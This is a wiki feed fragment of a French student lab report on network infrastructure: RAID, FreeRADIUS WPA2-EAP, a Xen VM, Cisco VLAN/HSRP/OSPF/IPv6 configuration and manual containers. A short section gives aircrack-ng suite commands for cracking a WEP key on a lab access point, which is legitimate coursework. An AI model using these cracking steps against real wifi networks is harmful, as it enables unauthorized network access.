  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49107</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49107"/>
				<updated>2018-12-21T15:36:49Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Configuration des VLANs 11 à 21 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
